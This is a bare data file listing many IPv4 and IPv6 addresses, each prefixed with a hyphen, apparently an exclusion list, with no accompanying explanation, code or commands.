-120.92.118.122 -173.230.146.150 -94.138.213.150 -111.231.118.148 -87.118.118.5 -107.178.147.73 -119.147.209.41 -149.62.172.41 -103.66.10.24 -121.28.51.86 -162.247.234.89 -137.74.205.151 -185.156.42.26 -121.42.38.194 -91.192.108.185 -49.248.42.179 -111.230.145.81 -149.12.208.143 -203.128.241.219 -72.52.136.37 -5.175.41.207 -107.170.43.12 -183.111.161.150 -182.16.8.163 -153.126.190.96 -106.3.44.74 -164.132.160.47 -94.155.93.16 -2600:3c01::f03c:91ff:fef1:4fdf -2a0a:7d80:1:7::97:4d -163.44.174.187 -2600:3c03::f03c:91ff:fe3b:dd47 -119.23.32.24 -2600:3c01::f03c:91ff:fea8:7f44 -119.86.72.19 -82.135.151.192 -2a01:7e00::f03c:91ff:fe56:8fd5 -199.231.187.72 -192.81.249.3 -171.244.8.155 -101.200.134.142 -104.148.100.124 -23.225.239.188 -2600:3c03::f03c:91ff:fe73:89dd -122.114.39.237 -23.252.170.233 -45.61.115.26 -185.211.244.128 -23.238.176.234 -66.221.17.201 -91.134.227.132 -91.225.115.84 -5.178.109.144 -195.123.212.7 -2a0a:7d80:1:9::99:dd -185.149.101.87 -34.197.59.54 -185.122.140.98 -62.213.100.250 -185.150.191.18 -47.90.210.120 -178.32.237.24 -198.24.128.18 -45.76.110.206 -180.179.52.185 -109.199.116.66 -103.240.215.32 -139.196.42.142 -193.124.181.169 -5.45.76.107 -49.212.137.254 -188.166.209.251 -173.193.149.121 -111.198.142.201 -2600:3c00::f03c:91ff:fe84:8191 -122.200.145.250 -185.129.249.16 -98.126.158.147 -103.48.80.138 -185.82.222.201 -82.98.105.250 -190.145.157.11 -59.37.5.43 -42.121.19.219 -2a01:7e00::f03c:91ff:fe89:d533 -188.68.240.175 -59.153.61.156 -2600:3c01::f03c:91ff:fe70:f85b -45.61.113.14 -109.206.189.225 -115.239.226.27 -81.22.4.55 -188.165.216.37 -31.210.66.54 -178.33.56.99 -223.71.153.66 -134.119.112.187 -120.24.60.98 -82.77.224.238 -120.76.97.244 -123.56.200.151 -107.191.60.94 -183.81.161.5 -180.178.59.109 -212.68.57.206 -194.39.84.54 -212.109.192.251 -67.212.169.91 -54.248.87.204 -2600:3c01::f03c:91ff:fe6e:c438 -72.10.55.208 -82.135.151.65 -46.101.96.104 -104.202.185.163 -199.73.53.12 -189.91.193.180 -199.119.140.18 -120.27.29.74 -139.162.130.25 -2001:4801:7825:104:be76:4eff:fe11:b0cc -2600:3c03::f03c:91ff:fe70:8487 -139.196.106.95 -104.245.102.107 -103.74.144.104 -79.143.182.172 -192.96.206.144 -2600:3c03::f03c:91ff:fe70:84f0 -222.134.133.90 -115.126.53.43 -112.124.17.24 -185.4.66.227 -216.17.108.201 -103.205.1.82 -2600:3c00::f03c:91ff:fedf:2aa8 -45.32.13.156 -113.111.49.7 -146.185.128.129 -156.235.170.111 -64.120.123.198 -212.83.47.20 -183.250.24.243 -117.78.52.202 -138.201.63.94 -138.197.201.206 -45.41.92.153 -118.26.161.28 -2a01:7e01::f03c:91ff:fe67:5206 -2600:3c01::f03c:91ff:fe37:6aa7 -190.205.43.251 -2600:3c03::f03c:91ff:fe6e:2682 -112.74.65.187 -188.68.37.240 -119.113.127.172 -149.202.111.155 -2600:3c00::f03c:91ff:fedf:bba7 -185.174.172.167 -41.134.68.202 -5.145.175.102 -91.218.231.116 -123.57.74.38 -205.186.152.104 -162.243.102.173 -122.9.229.186 -1.226.200.176 -45.56.111.189 -198.23.150.125 -121.41.121.156 -120.25.96.200 -86.104.177.3 -67.207.131.54 -103.100.157.194 -133.242.234.241 -23.225.0.66 -114.55.101.234 -118.190.60.24 -128.199.170.11 -192.141.168.133 -162.211.121.235 -2a0a:7d80:1:7::107:d4 -31.28.163.240 -45.76.226.35 -167.114.11.81 -2a01:7e00::f03c:91ff:fe84:f5fc -159.253.212.36 -2600:3c03::f03c:91ff:fe6e:33da -5.196.203.225 -185.129.248.221 -31.3.96.92 -45.112.125.101 -104.207.50.91 -110.34.224.82 -139.199.13.229 -45.35.99.160 -172.246.220.137 -2a0a:7d80:1:7::95:1a5 -153.127.203.101 -121.42.11.226 -37.59.171.184 -212.24.96.243 -2a01:7e00::f03c:91ff:fe84:84de -62.75.163.64 -123.57.218.230 -115.28.54.157 -106.15.136.170 -103.12.51.55 -104.238.124.129 -5.145.174.86 -123.56.160.193 -2600:3c00::f03c:91ff:fedf:723c -209.126.98.49 -103.240.215.94 -123.9.205.64 -123.207.230.223 -54.222.166.240 -2600:3c01::f03c:91ff:feae:929c -134.119.58.4 -104.250.133.164 -185.193.141.159 -96.44.179.242 -2600:3c01::f03c:91ff:fedb:98e1 -79.98.27.5 -78.41.233.158 -211.159.174.93 -2600:3c03::f03c:91ff:fe6e:de65 -2600:3c01::f03c:91ff:fedf:3ca3 -23.238.145.122 -184.154.109.172 -139.162.195.53 -162.144.154.177 -5.145.174.158 -23.247.10.180 -103.240.215.52 -70.38.58.244 -46.30.45.34 -23.88.82.26 -103.240.212.163 -37.140.195.2 -185.104.152.66 -52.215.30.50 -209.58.143.12 -2600:3c01::f03c:91ff:fe33:fa2f -2600:3c01::f03c:91ff:fef1:c2c3 -118.190.175.80 -217.114.216.223 -47.92.2.152 -123.56.194.72 -173.236.78.90 -86.107.176.30 -183.177.139.83 -188.165.129.182 -54.172.119.35 -158.69.142.157 -161.202.28.145 -178.62.162.166 -61.64.57.158 -139.199.104.243 -192.99.78.3 -2600:3c00::f03c:91ff:fedf:e013 -172.246.196.124 -2600:3c03::f03c:91ff:fea8:5249 -46.4.68.236 -212.191.130.228 -85.233.149.3 -39.108.51.109 -133.130.123.46 -118.89.63.94 -122.9.229.135 -98.126.79.154 -80.233.244.71 -204.155.30.3 -40.74.62.156 -146.71.124.202 -154.127.125.98 -50.115.116.241 -182.92.218.107 -37.59.133.140 -211.152.8.53 -80.233.244.82 -114.55.52.225 -217.23.14.40 -54.169.112.171 -106.14.61.85 -103.12.51.37 -107.180.76.237 -104.203.82.170 -153.120.0.93 -182.92.158.201 -45.124.252.2 -104.236.204.171 -212.68.57.178 -91.237.109.37 -117.184.201.218 -185.22.184.96 -122.9.18.173 -54.242.52.84 -71.13.170.202 -37.228.92.7 -27.255.72.159 -66.228.33.184 -107.163.113.2 -50.23.141.207 -194.145.209.160 -103.240.215.132 -23.238.145.107 -120.77.242.159 -71.18.91.60 -120.194.18.91 -209.182.211.113 -117.34.72.72 -91.237.109.39 -23.104.135.15 -89.208.146.207 -198.57.214.78 -216.107.153.222 -2600:3c03::f03c:91ff:fe08:cd42 -219.94.234.43 -192.254.137.54 -23.110.61.70 -198.98.50.133 -2600:3c03::f03c:91ff:fe08:de03 -101.200.158.239 -58.53.128.16 -118.190.19.143 -173.0.63.208 -5.153.4.251 -192.186.173.242 -101.37.82.96 -122.154.43.75 -185.50.196.237 -217.61.130.187 -222.124.185.83 -159.148.37.114 -120.196.169.40 -172.252.10.26 -112.124.8.77 -199.7.238.165 -185.162.128.142 -172.246.196.94 -23.229.4.42 -219.159.77.144 -115.29.100.207 -185.26.112.80 -171.217.59.114 -23.225.89.3 -156.235.170.24 -104.236.223.200 -185.83.146.103 -121.199.20.235 -67.205.130.84 -80.178.173.86 -23.252.163.153 -138.68.233.74 -47.94.42.146 -103.240.214.82 -23.230.19.184 -5.199.172.133 -54.91.19.110 -185.182.99.24 -151.80.7.173 -109.201.149.123 -105.247.204.73 -45.76.150.123 -202.171.225.113 -46.165.159.181 -103.27.177.238 -173.199.144.93 -23.89.12.62 -192.170.156.97 -2a0a:7d80:1:7::107:18 -202.171.225.111 -91.191.155.166 -155.94.205.146 -37.97.224.84 -210.245.92.131 -174.37.68.100 -185.18.148.9 -69.65.49.222 -122.114.38.177 -178.33.30.160 -163.172.78.150 -23.225.0.148 -65.60.5.98 -185.4.48.121 -128.199.204.32 -202.84.46.177 -198.178.122.163 -180.178.45.211 -107.179.98.113 -2a0a:7d80:1:9::98:185 -119.10.11.235 -98.124.177.206 -87.252.5.67 -213.159.208.10 -124.65.140.62 -185.66.140.66 -149.62.173.172 -103.100.157.41 -187.63.160.19 -107.178.136.14 -163.172.198.28 -172.246.196.67 -103.20.212.189 -107.163.113.80 -172.106.186.16 -178.62.84.140 -116.62.51.193 -49.212.20.41 -122.9.229.155 -43.255.123.83 -211.159.151.233 -123.57.191.192 -194.145.208.235 -176.31.30.80 -172.104.17.177 -46.231.204.49 -93.190.40.197 -85.254.126.86 -163.44.168.26 -192.99.109.23 -146.185.243.132 -146.185.243.132 -120.76.164.1 -153.122.17.134 -185.87.121.81 -193.70.85.212 -120.79.15.131 -27.133.132.36 -134.119.105.90 -194.19.246.9 -116.62.25.224 -218.232.75.237 -124.232.138.83 -112.74.92.49 -93.190.142.180 -136.243.26.206 -163.172.132.100 -107.178.150.126 -117.54.238.212 -188.165.215.179 -119.23.55.76 -37.139.9.111 -217.182.222.135 -154.56.1.33 -122.227.58.185 -93.115.31.62 -172.246.196.159 -183.78.182.184 -67.212.173.190 -177.87.96.74 -163.172.189.174 -185.153.222.142 -46.101.8.153 -154.56.1.31 -103.240.212.120 -116.249.243.108 -69.13.54.249 -217.160.182.214 -103.221.220.232 -104.131.77.145 -5.149.253.52 -199.101.146.57 -125.39.139.72 -115.126.53.13 -139.224.63.53 -103.240.215.113 -50.22.198.210 -120.199.7.56 -37.128.149.251 -198.15.119.147 -104.236.199.117 -216.92.205.16 -47.93.208.153 -198.204.247.46 -84.39.40.139 -159.65.196.219 -58.241.133.38 -93.190.40.205 -47.74.235.159 -172.106.187.246 -122.9.29.230 -67.222.133.245 -37.252.96.130 -156.67.218.41 -103.240.215.38 -103.196.240.84 -46.28.53.45 -5.135.224.54 -61.177.79.105 -121.42.205.117 -185.4.148.76 -218.153.66.82 -204.12.255.42 -167.114.131.197 -37.59.213.70 -198.8.88.206 -120.78.142.36 -193.70.78.198 -61.28.242.130 -193.70.107.43 -122.228.193.202 -23.19.202.48 -103.240.213.73 -153.120.164.238 -107.190.235.73 -188.166.188.149 -59.110.10.2 -67.205.143.138 -121.199.6.94 -201.49.15.180 -66.171.239.104 -104.232.75.174 -63.142.242.222 -88.214.230.126 -173.252.234.211 -159.148.13.140 -178.33.64.94 -138.197.106.192 -103.240.214.162 -128.199.130.135 -185.163.110.145 -173.252.197.118 -103.75.188.111 -137.74.139.41 -85.254.126.75 -37.230.99.70 -91.121.226.238 -173.67.7.245 -54.214.106.243 -176.221.75.138 -59.151.103.75 -109.199.116.50 -144.217.34.236 -172.104.184.52 -193.34.148.23 -192.99.24.29 -66.254.184.139 -45.55.65.57 -103.59.41.114 -87.237.169.86 -115.239.209.77 -45.255.134.75 -163.172.138.205 -122.114.48.6 -68.65.40.100 -153.126.151.253 -185.28.103.78 -23.225.89.112 -82.146.60.54 -109.203.126.81 -104.200.21.80 -222.73.69.203 -203.99.108.34 -213.152.165.70 -103.100.157.127 -217.23.157.132 -162.243.159.179 -86.105.32.27 -172.246.220.121 -47.93.128.76 -209.200.13.168 -209.152.165.176 -94.101.82.246 -151.80.176.58 -173.236.50.114 -119.42.146.226 -89.188.98.147 -177.189.252.238 -198.210.38.105 -51.255.62.117 -5.45.86.199 -86.122.112.53 -182.254.234.57 -120.24.50.61 -46.29.19.229 -89.108.124.40 -70.42.204.8 -158.69.132.33 -122.9.15.20 -185.86.210.97 -202.204.16.193 -103.12.49.34 -23.104.135.72 -198.27.100.156 -79.174.66.89 -202.155.211.41 -101.37.76.150 -205.147.99.153 -23.238.145.70 -45.35.99.180 -23.225.89.162 -142.91.95.32 -108.163.175.100 -27.152.28.41 -149.56.47.245 -157.52.130.133 -153.121.34.247 -65.60.43.162 -82.144.197.81 -45.32.74.251 -23.19.22.24 -103.240.213.225 -109.68.85.57 -176.31.133.76 -185.112.249.147 -176.31.246.224 -112.121.175.76 -158.69.210.141 -104.251.238.143 -201.49.207.11 -216.171.230.220 -64.237.52.35 -74.127.45.167 -157.118.201.175 -109.199.108.28 -104.203.82.213 -142.91.95.214 -66.34.182.173 -72.14.190.83 -108.161.138.185 -54.232.245.72 -118.193.235.81 -59.106.182.186 -77.81.120.246 -104.245.102.122 -46.249.195.221 -213.162.201.102 -85.185.91.138 -103.27.60.51 -122.114.57.23 -107.179.95.244 -91.215.192.6 -54.207.234.214 -180.151.61.237 -115.29.178.222 -139.196.230.42 -107.178.162.126 -108.170.25.162 -67.222.13.160 -212.227.9.204 -23.95.10.179 -116.62.206.162 -122.9.235.212 -45.56.82.172 -45.76.88.73 -62.210.72.78 -45.114.94.224 -45.117.168.208 -91.191.172.110 -115.29.41.65 -69.30.55.165 -174.137.172.180 -104.245.102.117 -103.240.214.226 -182.16.59.203 -134.119.115.165 -217.182.41.32 -185.129.249.145 -162.243.85.68 -185.13.56.23 -54.247.62.151 -121.196.226.99 -122.9.29.238 -49.212.140.232 -64.91.250.220 -176.38.9.43 -195.78.93.137 -176.34.61.65 -172.255.159.195 -116.55.243.98 -80.77.95.5 -198.50.241.249 -172.246.220.39 -198.27.77.236 -23.104.135.201 -162.212.130.216 -107.181.178.209 -119.23.246.94 -199.119.143.148 -172.255.159.199 -104.156.244.232 -23.244.241.220 -182.92.74.180 -216.17.110.21 -185.58.65.58 -5.35.246.65 -45.77.168.83 -83.99.248.129 -115.236.18.139 -177.234.150.173 -198.176.48.75 -5.178.109.48 -185.76.77.181 -62.213.105.6 -52.205.233.219 -138.128.120.136 -195.154.255.177 -95.183.12.159 -36.110.217.196 -216.107.153.140 -176.31.170.10 -120.79.38.114 -95.85.59.125 -5.9.158.213 -49.212.158.242 -111.67.198.131 -161.202.28.54 -154.56.1.18 -176.119.26.30 -164.132.237.225 -221.229.162.76 -37.59.62.44 -121.196.212.194 -144.48.220.55 -134.119.161.246 -185.95.3.154 -107.180.84.182 -160.16.56.138 -138.68.17.69 -118.89.141.112 -157.7.242.94 -118.190.95.148 -106.187.90.31 -60.190.136.75 -216.107.153.187 -49.212.63.57 -83.98.197.25 -172.106.184.35 -115.159.47.41 -95.85.13.61 -174.138.26.203 -188.138.94.99 -2.88.194.161 -23.225.0.17 -91.223.123.86 -134.119.16.25 -85.95.239.66 -23.89.176.190 -173.255.205.13 -47.52.246.68 -45.32.112.51 -5.45.78.206 -85.254.126.85 -172.104.15.227 -80.82.67.73 -178.33.15.72 -211.147.77.13 -34.196.241.173 -27.126.187.188 -121.41.88.2 -115.228.190.0 -185.122.140.65 -104.168.87.38 -45.42.94.179 -212.129.53.14 -139.196.230.68 -27.17.12.107 -114.67.228.33 -184.73.174.142 -23.234.22.25 -161.202.70.201 -45.32.44.36 -103.233.2.81 -198.16.74.36 -103.15.226.26 -120.55.118.169 -45.76.180.156 -128.199.114.43 -185.93.226.235 -64.207.184.73 -118.89.16.182 -156.67.216.82 -13.229.106.152 -123.59.199.93 -120.27.216.244 -86.104.177.119 -23.110.61.123 -5.178.109.191 -37.59.149.164 -196.43.199.67 -50.23.130.146 -79.98.109.61 -103.23.79.191 -180.178.59.107 -119.6.241.53 -122.9.163.252 -103.21.225.226 -192.36.219.126 -133.242.27.38 -185.93.245.221 -222.78.231.226 -121.10.173.227 -178.170.217.79 -173.236.78.78 -220.181.86.27 -111.67.198.240 -85.254.126.43 -60.194.2.26 -98.124.177.167 -80.233.244.92 -96.125.140.75 -220.179.118.245 -194.19.246.93 -61.134.126.48 -184.171.249.53 -184.105.162.177 -113.139.15.160 -198.211.115.10 -106.15.139.58 -178.33.249.252 -101.251.212.42 -64.207.149.145 -218.249.67.182 -23.247.10.172 -119.147.44.162 -209.200.13.203 -123.60.202.243 -103.91.126.28 -173.82.138.195 -120.194.85.20 -37.59.247.6 -31.24.41.178 -91.221.71.81 -218.248.36.69 -101.37.202.209 -202.146.208.187 -61.153.58.35 -209.200.13.167 -59.12.204.8 -104.199.100.65 -69.30.55.113 -122.13.68.133 -5.145.174.204 -5.39.102.38 -112.74.99.200 -138.128.124.223 -91.239.235.126 -46.183.166.70 -188.165.122.88 -182.254.213.32 -79.137.3.22 -23.19.238.17 -175.122.253.24 -107.178.136.13 -110.88.128.21 -211.147.6.220 -185.178.184.42 -178.33.105.34 -31.220.53.135 -172.246.220.250 -173.252.249.177 -95.163.100.250 -119.23.132.161 -172.106.187.229 -51.254.165.42 -23.238.129.103 -31.171.246.135 -203.114.74.98 -2a01:7e00::f03c:91ff:fe7a:ab0c -69.167.182.61 -114.215.137.52 -5.178.109.168 -104.243.37.66 -172.247.51.2 -111.93.56.155 -104.203.82.124 -23.249.168.124 -67.23.248.141 -91.121.84.170 -178.172.173.40 -123.56.100.26 -192.99.140.16 -2a0a:7d80:1:7::101:101 -118.190.147.152 -119.252.169.213 -114.25.216.36 -50.194.165.179 -13.126.188.36 -103.240.212.95 -104.245.102.35 -64.71.72.133 -103.50.8.4 -47.22.14.35 -211.149.195.254 -185.129.248.247 -174.137.164.184 -122.9.229.160 -172.85.98.227 -103.200.5.181 -13.59.112.76 -160.16.84.73 -115.28.169.113 -81.93.77.248 -150.95.146.167 -93.89.112.208 -160.16.50.78 -45.32.121.29 -113.196.233.181 -31.3.153.37 -111.202.15.46 -2a02:c207:3001:4484::1 -103.240.212.140 -115.159.49.137 -120.26.213.42 -176.56.1.54 -194.145.208.238 -1.255.109.14 -136.0.69.123 -95.85.43.107 -185.93.245.61 -5.135.112.231 -47.88.84.228 -101.132.175.49 -104.207.44.108 -125.212.217.107 -123.207.220.246 -122.9.18.158 -104.232.75.162 -103.240.214.186 -63.142.254.201 -45.114.124.31 -93.115.52.11 -198.98.112.27 -112.78.10.122 -103.205.2.66 -107.180.84.36 -103.240.213.82 -50.31.4.188 -59.54.202.8 -108.179.209.188 -103.240.212.206 -173.0.63.142 -118.178.187.43 -178.33.57.94 -23.244.241.116 -218.232.75.186 -37.1.214.58 -144.217.93.183 -203.147.31.30 -64.237.48.165 -200.74.240.39 -172.246.220.44 -122.49.224.38 -39.106.62.135 -2a01:91c0:1:4:d6ae:52ff:fe69:6a2a -142.44.151.9 -121.46.18.117 -91.142.215.239 -111.65.225.226 -112.74.96.38 -103.240.214.81 -45.76.183.58 -182.16.1.221 -176.114.0.47 -216.107.153.201 -185.86.210.204 -101.132.182.15 -69.4.87.56 -171.116.143.60 -2a0a:7d80:1:7::92:143 -5.145.174.170 -172.246.220.74 -67.19.21.142 -193.70.12.78 -61.128.110.32 -134.119.31.29 -173.239.7.108 -5.178.109.133 -107.187.41.52 -67.225.128.104 -47.95.198.88 -72.249.158.51 -121.40.204.254 -211.150.66.165 -188.40.114.58 -64.120.123.201 -115.231.101.135 -103.28.38.203 -124.42.53.236 -103.240.215.139 -149.62.170.192 -120.79.155.168 -69.175.44.101 -104.202.185.206 -185.122.140.108 -192.95.58.159 -121.199.16.231 -39.108.144.72 -76.72.168.168 -54.166.156.211 -112.74.78.48 -106.14.132.30 -91.221.206.110 -156.235.170.6 -123.103.11.19 -142.91.241.67 -120.25.125.126 -103.28.38.142 -103.240.212.7 -198.58.107.57 -85.118.114.115 -130.193.108.85 -103.225.168.226 -66.185.21.24 -122.114.38.135 -172.246.220.112 -103.240.212.197 -218.32.216.178 -62.138.205.66 -137.74.57.209 -120.77.45.229 -119.23.38.29 -216.107.153.132 -149.56.201.213 -203.171.228.157 -198.23.130.250 -52.224.181.56 -104.131.153.119 -162.243.169.156 -205.186.152.132 -194.146.230.52 -139.162.63.212 -120.79.166.6 -23.225.196.234 -198.24.163.232 -86.104.177.122 -89.45.227.29 -178.33.39.63 -107.170.221.198 -223.72.254.130 -81.21.199.216 -74.123.228.68 -94.23.83.0 -2605:6280:1:d::41 -114.55.35.163 -54.175.147.186 -94.75.214.153 -41.206.193.117 -85.31.102.109 -69.61.64.190 -85.239.227.189 -121.40.39.51 -89.108.111.37 -101.200.139.116 -45.33.24.199 -172.102.197.166 -182.92.231.99 -46.137.98.166 -66.171.239.13 -107.180.76.76 -23.89.176.187 -193.29.187.209 -5.8.32.233 -103.239.242.36 -193.124.17.146 -98.124.177.171 -67.205.131.222 -115.29.245.52 -91.224.194.151 -89.208.156.115 -139.162.40.200 -142.4.107.86 -142.54.177.238 -173.209.44.136 -31.28.167.92 -221.230.198.5 -172.107.146.131 -91.205.16.173 -139.129.243.198 -101.0.72.68 -107.179.98.110 -177.91.32.35 -211.149.188.109 -140.143.90.207 -217.23.11.204 -50.23.130.151 -49.212.169.84 -198.44.190.152 -212.68.42.178 -158.69.116.97 -27.133.136.169 -70.38.30.155 -153.120.17.134 -198.200.41.31 -47.96.164.130 -66.185.17.75 -103.35.202.165 -120.26.223.133 -138.197.193.241 -37.75.12.204 -92.43.113.77 -185.104.152.170 -107.160.44.250 -133.18.31.198 -46.166.181.63 -122.226.90.204 -52.67.110.121 -153.126.172.74 -176.111.16.244 -45.42.94.170 -23.19.237.28 -109.206.177.62 -104.202.185.28 -124.202.153.85 -120.31.142.91 -178.170.218.41 -103.12.50.44 -5.189.154.27 -149.210.227.93 -221.234.36.130 -47.88.157.70 -116.213.39.61 -5.188.204.202 -192.99.29.168 -216.17.110.42 -94.23.176.83 -207.58.177.62 -107.178.149.87 -204.44.104.233 -104.202.185.38 -23.92.221.125 -185.149.103.230 -212.63.111.195 -175.106.15.77 -139.129.212.100 -210.245.17.36 -162.243.21.106 -176.58.115.253 -69.30.203.10 -178.18.86.225 -45.56.104.214 -45.55.81.30 -37.221.187.180 -178.239.59.168 -193.70.55.138 -89.16.165.180 -50.22.189.35 -205.204.78.215 -54.37.177.230 -122.129.108.186 -45.61.114.46 -192.154.213.238 -178.32.44.218 -174.137.136.244 -159.148.37.110 -172.246.220.120 -103.82.242.230 -178.32.28.161 -194.54.27.116 -205.186.161.149 -185.81.164.159 -86.105.32.23 -23.225.0.16 -160.16.230.207 -173.230.154.155 -23.110.56.84 -62.213.100.242 -138.201.176.138 -182.254.232.174 -153.121.68.75 -27.118.26.83 -45.35.102.170 -185.83.217.37 -178.172.236.61 -205.204.94.155 -84.2.34.142 -2a0a:7d80:1:7::107:32 -150.95.144.45 -153.120.38.26 -156.237.176.196 -150.95.175.206 -118.178.92.29 -31.220.53.40 -172.247.51.162 -142.91.243.117 -104.238.135.54 -153.121.34.25 -92.249.68.6 -175.124.123.26 -207.244.103.137 -54.38.130.248 -188.40.103.247 -79.134.203.131 -188.165.132.225 -200.37.170.68 -101.37.85.22 -120.25.217.106 -156.237.179.109 -172.247.51.4 -172.255.159.212 -178.33.227.193 -82.223.133.173 -5.135.58.87 -218.32.216.222 -61.91.237.158 -45.76.193.138 -178.32.165.171 -166.63.21.24 -23.238.145.111 -128.199.139.214 -27.118.26.91 -103.3.173.132 -213.32.113.148 -107.181.251.133 -121.41.29.147 -41.217.204.100 -103.232.33.60 -91.229.23.94 -142.91.239.114 -209.59.144.49 -217.23.5.118 -119.160.192.66 -172.104.148.112 -37.59.160.52 -140.143.185.187 -1.23.183.200 -120.24.220.35 -202.6.17.169 -121.41.86.189 -52.18.190.21 -23.229.227.174 -59.153.151.230 -31.220.59.52 -185.48.64.130 -107.179.93.40 -222.233.54.26 -31.222.138.229 -47.92.66.87 -88.151.43.140 -121.54.161.115 -119.29.229.211 -104.203.82.175 -180.168.103.51 -65.111.162.139 -91.142.213.86 -208.43.235.72 -37.59.81.64 -122.9.22.188 -120.197.94.145 -217.150.94.10 -37.153.98.141 -185.4.67.65 -23.250.28.16 -172.246.220.216 -82.177.87.108 -209.236.114.125 -45.114.94.178 -34.199.161.49 -118.190.22.139 -212.116.121.59 -213.238.161.60 -100.42.120.18 -121.42.199.13 -67.229.72.72 -23.225.239.124 -23.225.239.253 -212.14.4.25 -103.240.214.250 -172.246.220.147 -38.77.16.13 -45.32.102.50 -92.243.38.5 -95.85.12.149 -193.34.145.116 -196.196.24.84 -107.180.71.238 -31.148.220.98 -189.120.192.230 -118.193.219.36 -62.220.210.75 -104.149.66.135 -178.20.158.215 -71.19.249.97 -45.55.49.111 -115.126.51.7 -198.143.186.89 -66.85.175.13 -79.98.104.70 -2401:c900:1101:471::2 -104.238.150.136 -116.213.144.138 -43.243.75.80 -23.19.22.60 -173.214.110.236 -5.189.130.2 -45.35.125.37 -2600:3c00::f03c:91ff:fe28:96cd -103.244.2.20 -172.247.51.193 -101.37.160.46 -192.71.222.167 -133.242.156.129 -185.191.197.88 -185.164.138.216 -180.188.196.214 -61.172.246.147 -5.39.219.58 -188.166.57.117 -119.47.89.72 -39.108.116.205 -94.198.194.220 -167.114.57.35 -180.168.28.47 -47.90.3.128 -58.120.227.40 -119.38.132.209 -158.69.183.27 -216.151.160.54 -107.178.149.113 -112.16.156.181 -162.214.14.7 -103.11.75.33 -111.231.146.89 -173.224.64.221 -116.62.124.251 -107.178.162.85 -172.246.220.213 -199.231.187.15 -103.210.239.190 -54.176.95.0 -35.176.145.176 -207.7.87.111 -42.62.92.106 -199.101.145.78 -196.11.82.11 -23.238.176.209 -60.165.104.82 -113.119.166.241 -23.238.166.161 -222.75.167.211 -185.129.249.15 -104.207.52.102 -49.212.184.23 -188.226.173.246 -45.79.139.203 -185.195.24.196 -122.225.96.91 -112.253.2.49 -193.70.96.145 -120.27.40.168 -103.205.3.83 -37.220.3.147 -122.152.210.28 -192.241.212.43 -69.61.64.184 -107.178.150.117 -142.91.241.68 -107.178.147.114 -163.44.207.235 -120.24.154.179 -202.6.17.131 -115.28.168.75 -155.94.195.153 -115.146.121.230 -47.90.9.66 -65.60.43.165 -209.58.164.31 -119.29.36.54 -67.225.236.46 -61.183.64.27 -172.106.184.38 -192.81.79.92 -116.62.69.10 -118.193.255.219 -197.81.131.101 -64.120.123.231 -145.239.208.14 -158.69.99.20 -173.193.46.240 -103.26.77.239 -112.74.193.37 -142.91.95.199 -2a0a:1b00:1::1 -106.75.37.38 -115.210.22.108 -185.60.133.77 -88.150.137.217 -153.126.217.225 -173.198.249.38 -107.191.126.127 -194.19.246.146 -93.125.48.8 -107.178.147.115 -219.217.72.25 -82.146.58.243 -182.16.86.52 -96.47.234.60 -122.114.42.152 -212.68.50.94 -125.212.250.121 -120.24.17.38 -192.186.173.252 -139.162.2.157 -54.159.186.197 -185.122.140.66 -96.30.48.140 -62.213.100.245 -45.32.92.191 -192.99.170.158 -45.114.94.219 -178.32.190.33 -121.43.161.113 -42.120.7.203 -157.52.130.131 -120.25.59.45 -194.19.246.54 -104.232.75.153 -101.37.20.169 -104.207.52.125 -91.224.194.60 -23.224.115.108 -216.17.105.29 -37.187.238.221 -199.101.134.198 -122.114.231.14 -117.120.49.249 -123.56.193.187 -193.142.158.117 -192.250.225.110 -80.241.216.165 -2a02:c207:2006:8585::1 -165.254.121.168 -112.29.252.252 -37.123.98.166 -103.240.212.141 -178.32.127.116 -178.170.217.70 -103.43.69.126 -104.232.102.160 -202.171.225.112 -64.120.123.205 -107.180.78.173 -45.76.163.244 -103.21.182.104 -106.15.46.83 -136.243.7.253 -139.162.155.173 -5.178.109.27 -166.62.74.200 -121.41.224.185 -150.95.132.52 -172.246.220.130 -213.136.85.238 -104.245.102.36 -34.216.18.210 -219.117.246.243 -159.203.170.243 -132.148.9.188 -5.178.109.14 -119.9.88.193 -118.67.212.156 -122.9.15.58 -103.200.32.41 -185.104.152.224 -107.175.219.14 -72.52.162.69 -202.181.101.16 -23.230.19.34 -103.27.61.209 -180.96.21.51 -211.149.158.31 -66.254.176.78 -85.25.242.200 -23.225.239.88 -185.106.106.14 -31.187.70.223 -67.205.137.95 -222.178.122.6 -172.247.51.111 -212.83.139.169 -23.225.239.237 -120.76.160.55 -66.90.119.172 -120.132.101.97 -23.229.124.43 -123.56.187.220 -79.98.108.150 -69.13.210.180 -192.225.193.158 -209.200.41.222 -116.255.223.244 -95.213.179.113 -23.19.237.15 -162.243.11.67 -120.26.118.190 -91.195.200.71 -211.149.237.218 -188.120.237.136 -5.135.112.238 -192.155.86.33 -162.209.215.164 -112.74.163.52 -23.238.145.113 -66.241.111.25 -176.126.168.7 -120.77.144.1 -210.211.127.181 -209.58.177.124 -108.168.174.110 -121.40.27.56 -95.218.87.12 -209.200.18.246 -107.178.162.108 -124.248.207.253 -206.190.150.83 -111.230.237.106 -47.88.138.93 -54.164.137.102 -93.104.213.176 -201.76.128.133 -112.124.2.65 -106.185.42.68 -142.91.241.95 -49.212.15.79 -184.154.163.82 -158.69.100.52 -210.51.163.185 -45.79.216.168 -208.167.237.230 -207.244.103.144 -188.93.232.9 -103.240.213.234 -47.92.143.220 -153.122.4.98 -194.28.89.148 -198.210.37.239 -198.57.176.178 -194.117.246.25 -188.124.21.158 -91.200.43.209 -111.67.65.20 -216.17.108.166 -202.93.143.216 -45.114.94.182 -114.113.93.19 -45.55.225.158 -104.171.188.82 -138.68.55.94 -120.24.230.159 -185.98.7.100 -134.119.150.79 -207.148.77.55 -119.23.78.218 -183.62.138.104 -192.241.160.91 -123.56.48.18 -133.130.122.74 -164.132.171.88 -45.76.183.5 -172.246.196.206 -156.235.170.118 -92.50.113.156 -133.242.181.152 -172.246.196.232 -176.126.165.33 -204.152.217.210 -185.89.204.9 -64.6.105.35 -23.244.241.90 -185.95.84.29 -212.24.109.4 -211.149.204.158 -45.40.139.86 -158.69.39.168 -185.65.120.178 -192.99.230.47 -103.235.230.7 -174.139.199.115 -112.124.17.96 -5.135.58.116 -107.161.95.25 -185.129.248.78 -118.190.211.16 -107.187.41.235 -68.232.185.73 -142.4.119.114 -122.9.29.254 -192.210.145.175 -54.68.44.41 -14.225.2.68 -50.23.130.163 -54.205.123.179 -5.178.109.213 -91.108.26.180 -114.215.195.97 -103.240.212.173 -67.205.175.50 -49.212.234.83 -192.81.209.191 -208.90.184.5 -23.225.239.193 -156.237.178.150 -192.81.79.94 -187.17.123.177 -154.56.1.62 -192.190.84.200 -121.40.239.171 -188.166.110.196 